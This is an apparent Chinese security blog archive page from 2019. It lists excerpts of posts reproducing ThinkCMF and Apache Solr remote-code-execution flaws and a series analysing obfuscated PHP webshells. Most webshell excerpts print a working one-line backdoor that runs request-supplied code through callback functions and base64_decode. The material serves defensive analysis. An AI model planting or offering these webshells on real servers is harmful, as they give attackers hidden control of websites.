11 2019 档案
摘要:ThinkCMF X1.6.0-X2.2.3框架任意内容包含漏洞分析复现 一、ThinkCMF简介 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理系统框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需
阅读全文
摘要:Apache Solr Velocity模板注入RCE漏洞复现 一、Apache Solr介绍 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于web-service的API接口,用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引,也可以通过http get操作提
阅读全文
摘要:WebShell代码分析溯源(十一) 一、一句话变形马样本 <?php $e = $_REQUEST['e'];declare(ticks=1);register_tick_function ($e, $_REQUEST['GET']);?> 二、代码分析 1、调整代码格式 2、分析代码 2.1、首
阅读全文
摘要:WebShell代码分析溯源(十) 一、一句话变形马样本 <?php $e = $_REQUEST['e'];register_shutdown_function($e, $_REQUEST['REQUEST']);?> 二、代码分析 1、调整代码格式 2、分析代码 1、首先使用REQUEST方法接
阅读全文
摘要:WebShell代码分析溯源(九) 一、一句话变形马样本 <?php $e = $_REQUEST['e'];$arr = array($_POST['pass'] => '|.*|e',);array_walk($arr, $e, '');?> 二、代码分析 1、调整代码格式 2、分析代码 1、首
阅读全文
摘要:WebShell代码分析溯源(八) 一、一句话变形马样本 <?php $e=$_REQUEST['e'];$arr= array('test', $_REQUEST['POST']);uasort($arr, base64_decode($e));?> 二、代码分析 1、调整代码格式 2、分析代码
阅读全文
摘要:WebShell代码分析溯源(七) 一、一句话变形马样本 <?php $e = $_REQUEST['e'];$arr = array($_POST['POST'],);array_map(base64_decode($e), $arr);?> 二、代码分析 1、调整代码格式 2、分析代码 分析代码
阅读全文
摘要:WebShell代码分析溯源 一、一句话变形马样本 <?php call_user_func('assert', $_REQUEST['assert']); ?> 二、代码分析 1、分析代码 call_user_func('assert', $_REQUEST['assert'])中assert是第
阅读全文
摘要:WebShell代码分析溯源(五) 一、一句话变形马样本 <?php $e=$_REQUEST['e'];$arr=array($_POST['POST'],);array_filter($arr,base64_decode($e)); ?> 二、代码分析 1、调整代码格式 2、分析代码 首先使用R
阅读全文
